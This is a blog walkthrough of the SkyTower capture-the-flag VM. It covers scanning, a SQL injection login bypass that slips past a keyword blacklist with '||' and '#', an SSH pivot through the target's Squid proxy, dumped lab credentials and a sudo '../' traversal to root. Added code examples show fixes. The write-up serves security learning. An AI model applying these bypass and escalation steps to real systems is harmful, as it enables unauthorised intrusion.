Saturday, May 30, 2015

The Sky Tower Vulnerable VM Walkthrough



I recently took on the challenge to hack the Sky Tower Vulnerable VM. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the "flag".

As usual this VM is hosted by the good folks at vulnhub.com with a ton of other challenges. Here's the approach that I took to gain root level access to the box:

Enumeration

root@kali:~# nmap -A 10.1.1.7

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-28 20:55 EDT
Nmap scan report for 10.1.1.7
Host is up (0.00084s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 10.1.1.7




The quick glance shows a filtered SSH service, a possible website on port 80, and a Squid HTTP proxy. Needing more information, I fired up Nikto and dirb.

root@kali:~# nikto -h 10.1.1.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:10.1.1.7
+ Target Hostname: 10.1.1.7
+ Target Port: 80
+ Start Time: 2015-05-28 21:23:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7343 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2015-05-28 21:24:01 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# dirb http://10.1.1.7

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Thu May 28 21:25:56 2015
URL_BASE: http://10.1.1.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://10.1.1.7/ ----
+ http://10.1.1.7/background (CODE:200|SIZE:2572609)
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)
+ http://10.1.1.7/index (CODE:200|SIZE:1136)
+ http://10.1.1.7/index.html (CODE:200|SIZE:1136)
+ http://10.1.1.7/server-status (CODE:403|SIZE:289)
-----------------
DOWNLOADED: 4592 - FOUND: 5


Ok, looking at these results, I see an outdated version of Apache running, a login.php page which warrants a closer look, and several pages identified by dirb which require investigation.

First let's take a look at the login.php page. We find a typical form-based login page which may be susceptible to SQL injection:





Using basic single-quote probes in the form fields, I was able to get the application to generate an overly verbose error message revealing the underlying database type:





Curious, and wanting to justify advancing down the SQLi path, I ran Uniscan to confirm the injection point:

root@kali:~# uniscan -u http://10.1.1.7/login.php -d
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.2


Scan date: 28-5-2015 22:0:26
=============================================
| Domain: http://10.1.1.7/login.php/
| Server: Apache/2.2.22 (Debian)
| IP: 10.1.1.7
=============================================
|
| Crawler Started:
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| [+] Crawling finished, 0 URL's found!
|
| FCKeditor File Upload:
|
| E-mails:
|
| External hosts:
|
| Web Backdoors:
|
| File Upload Forms:
|
| Source Code Disclosure:
|
| PHPinfo() Disclosure:
|
| Timthumb:
|
| Ignored Files:
============================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 0 New directories added

| FCKeditor tests:

| Timthumb < 1.33 vulnerability:

| Backup Files:

| Blind SQL Injection:

| Local File Include:

| PHP CGI Argument Injection:

| Remote Command Execution:

| Remote File Include:
| |
| SQL Injection:
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123'&password=123
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123&password=123'

| Cross-Site Scripting (XSS):
|
|
| Web Shell Finder:
====================================

HTML report saved in: report/10.1.1.7.html




I attempted multiple SQL injection login bypass strings to no avail. Additionally, I fired up the Tamper Data browser plugin to gain a bit more control over the requests being sent.



Mildly frustrated, I began a search for common SQL injection blacklist bypass techniques. I found lots of information, maybe too much; but eventually I stumbled upon an awesome whitepaper on the exploit-db site https://www.exploit-db.com/papers/17934/.



From the whitepaper I extracted this guidance:

Here is a simple bypass using &&, || instead of and, or respectively.

Filtered injection:
1 or 1 = 1
1 and 1 = 1

Bypassed injection:
1 || 1 = 1
1 && 1 = 1


I used this new-found information to attempt a bypass on the login page. A bit of additional trial and error, mainly around the proper terminating comment character ("--" versus "#"), got me past the login page:






Ignoring the filtered status of port 22, I attempted a direct SSH connection, which failed as expected:




Taking the Squid HTTP proxy approach, I decided to tunnel through it with proxychains. I'd recently performed a similar pivot in the Offensive Security OSCP lab, so it wasn't totally foreign to me. I modified /etc/proxychains.conf to point at the victim's Squid proxy on port 3128. Because the proxy runs on the target itself, the CONNECT to 10.1.1.7:22 originates locally rather than from my attacking host, so the external filtering of port 22 no longer gets in the way.
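The proxychains configuration implied by the chain output below, written out here as an added example rather than the original post's screenshot. The timeout values are Kali's defaults and are assumed; the only line that actually needs changing is the ProxyList entry:

```conf
# /etc/proxychains.conf -- only the lines that matter for this pivot.
# Timeouts are the Kali defaults (assumed); the ProxyList entry is the edit.
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# type  host      port   -- Squid on the target, as found by nmap
http    10.1.1.7  3128
```

Check the hop before spending time on SSH: `proxychains nc -zv 10.1.1.7 22` should print the same `-<><>-OK` chain line. A stock Squid denies CONNECT to anything outside its SSL_ports ACL (port 443), so a chain that succeeds to port 22 tells you this instance has been opened up; a refused CONNECT shows up as `<--denied` in the chain line instead.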



Proxychains was able to successfully connect to the machine's SSH port using the obtained credentials:

root@kali:~# proxychains ssh john@10.1.1.7
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
The authenticity of host '10.1.1.7 (10.1.1.7)' can't be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.7' (ECDSA) to the list of known hosts.
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 10.1.1.7 closed.
root@kali:~#




Upon connection the session closes immediately; however, I was still able to execute single commands over SSH (ssh user@host "command"). With that I could continue enumerating the system, attempt a reverse shell, try to escape whatever keeps closing the shell on login, and so on.

Issuing a "/bin/sh -i" command got me a more persistent shell, but one without job control. Afraid that this would restrict something I wanted to do, I opted instead to deal with the .bashrc file in John's home directory, which turned out to be what prints the "Funds have been withdrawn" message and ends the session:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile


I simply renamed the .bashrc file to break its hold on my login shell. Note that this is a visible modification to the target's dotfiles, so put it back when you are done.

root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc bashrc.bak"
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:


Finally got a solid shell:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 28 23:52:47 2015 from 10.1.1.7
john@SkyTower:~$


Poking around on the system, I took a look at the login.php file and found hardcoded MySQL database credentials:



I also found the pesky culprit behind our SQL injection auth-bypass troubles: a keyword blacklist applied with str_ireplace, after which the stripped input is still concatenated straight into the query:

$sqlinjection = array("SELECT", "TRUE", "FALSE", "--","OR", "=", ",", "AND", "NOT");
$email = str_ireplace($sqlinjection, "", $_POST['email']);
$password = str_ireplace($sqlinjection, "", $_POST['password']);

$sql= "SELECT * FROM login where email='".$email."' and password='".$password."';";
$result = $db->query($sql);
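
To make the filter's behaviour concrete, here is an added Python example (mine, not code from the original post or from the VM's login.php) that emulates the str_ireplace blacklist above, assembles the same query string, and shows which payloads survive: the classic `' or 1=1 --` is mangled, `' || 1 #` passes untouched, and because str_ireplace makes a single pass a nested token such as `OORR` collapses back into `OR`. The parameterised `safe_login` at the end, run against a constructed in-memory SQLite copy of the login table, is the fix that makes the blacklist unnecessary.

```python
import re
import sqlite3

# Blacklist and query shape copied from the login.php excerpt on this page.
BLACKLIST = ["SELECT", "TRUE", "FALSE", "--", "OR", "=", ",", "AND", "NOT"]
QUERY_TEMPLATE = "SELECT * FROM login where email='{email}' and password='{password}';"


def php_str_ireplace(terms, value):
    """Emulate PHP's str_ireplace($terms, "", $value): each term is removed
    case-insensitively in one left-to-right pass, in array order, and the
    result is never rescanned. That single pass is why 'OORR' survives as 'OR'."""
    for term in terms:
        value = re.sub(re.escape(term), "", value, flags=re.IGNORECASE)
    return value


def build_vulnerable_query(email, password):
    """Assemble the query exactly the way login.php does: filter, then
    concatenate. This reproduces the page's vulnerable pattern on purpose."""
    return QUERY_TEMPLATE.format(
        email=php_str_ireplace(BLACKLIST, email),
        password=php_str_ireplace(BLACKLIST, password),
    )


def survives_filter(payload):
    """True when the blacklist leaves the payload byte-for-byte intact."""
    return php_str_ireplace(BLACKLIST, payload) == payload


# --- hardened form: parameterised query over a constructed sample table ---
SAMPLE_ROWS = [  # constructed to mirror the page's SkyTech.login dump
    (1, "john@skytech.com", "hereisjohn"),
    (2, "sara@skytech.com", "ihatethisjob"),
    (3, "william@skytech.com", "senseable"),
]


def safe_login(email, password):
    """Parameterised lookup: the driver sends the values separately from the
    SQL text, so '||', '#' and quotes are just data. Returns matching emails.
    Plaintext password storage is kept only to mirror the page; real code
    should store a salted hash and compare against that instead."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER, email TEXT, password TEXT)")
    con.executemany("INSERT INTO login VALUES (?, ?, ?)", SAMPLE_ROWS)
    rows = con.execute(
        "SELECT email FROM login WHERE email=? AND password=?", (email, password)
    ).fetchall()
    con.close()
    return [r[0] for r in rows]


if __name__ == "__main__":
    for payload in ["' or 1=1 --", "' || 1 #", "' OORR 1 #"]:
        print(f"{payload!r:16} -> {build_vulnerable_query(payload, 'x')}")
    print(safe_login("' || 1 #", "x"))
    print(safe_login("john@skytech.com", "hereisjohn"))
```

The first payload comes out as `email=''  11 '`, a syntax error, which is exactly the dead end described earlier; the second and third reach MySQL as `email='' || 1 #...` and `email='' OR 1 #...`, both true for every row. The lesson is that a blacklist only changes which payload works, whereas the parameterised query removes the injection point entirely.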


Using the DB credentials, I logged in to MySQL and extracted additional user credentials, stored in plaintext:

john@SkyTower:/var/www$ mysql --user=root --password=root SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2288
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


-----------------------------------------------------------------------------------------------------------------------------------------------

mysql> use SkyTech;
Database changed

mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

mysql>

Giving the DB usernames and passwords a try for system login worked out for me: sara's database password was reused for her system account. sara had limited sudo access to run ls and cat against a couple of directories, but the sudo rule evidently matches the argument textually, so a "/accounts/../root/" traversal satisfies it while actually targeting root's home. I used this to list the root home directory and cat the flag.txt file.

sara@SkyTower:~$ sudo ls /accounts/../root/
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower


sara@SkyTower:~$ su root
Password:
root@SkyTower:~#
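
The traversal above works because sudoers compares command arguments against wildcard patterns with fnmatch-style globbing, where `*` also matches `/`, and never canonicalises the path. The following added Python example (mine, not the VM's configuration) models that matching next to the check the rule author actually wanted. The sudoers rule is assumed, since the page shows only the resulting commands:

```python
import fnmatch
import os

# Assumed sudoers rule for sara (hypothetical; the page shows only the commands):
#   sara ALL=(ALL) /bin/ls /accounts/*, /bin/cat /accounts/*
ALLOWED = [
    ("/bin/ls", "/accounts/*"),
    ("/bin/cat", "/accounts/*"),
]
INTENDED_ROOT = "/accounts"


def sudoers_permits(argv, rules=ALLOWED):
    """Model how sudoers matches a command: the binary must match exactly and
    the argument string is compared against the rule's wildcard pattern with
    fnmatch-style globbing, where '*' also matches '/'. That textual match is
    all sudo does; it never resolves '..' in the arguments."""
    binary, args = argv[0], " ".join(argv[1:])
    return any(binary == cmd and fnmatch.fnmatchcase(args, pat) for cmd, pat in rules)


def stays_inside(path, root=INTENDED_ROOT):
    """What the rule author meant: collapse '..' and check where the path
    really points. normpath is used rather than realpath so the check is
    purely lexical and does not need /accounts to exist on the host running
    this; a real enforcement point would also resolve symlinks."""
    resolved = os.path.normpath(path)
    return resolved == root or resolved.startswith(root + "/")


def classify(argv):
    """Return (sudo_allows, target_actually_inside_accounts) for one command."""
    return sudoers_permits(argv), stays_inside(argv[-1])


if __name__ == "__main__":
    for argv in (["/bin/ls", "/accounts/sara"],
                 ["/bin/ls", "/accounts/../root/"],
                 ["/bin/cat", "/accounts/../root/flag.txt"],
                 ["/bin/cat", "/etc/shadow"]):
        print(" ".join(argv), classify(argv))
```

The second and third cases are the ones sara ran: sudo says yes, the path check says no. The practical fix on the sudoers side is to avoid wildcards in arguments altogether and list the exact files or use a wrapper script that validates its input, because no glob pattern can express "under this directory" once `..` is allowed in the string.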


Well, that's all for this one. I really enjoyed this challenge. I'll keep my eyes open for more from the folks at Telspace Systems.


Court Graham, signing off....
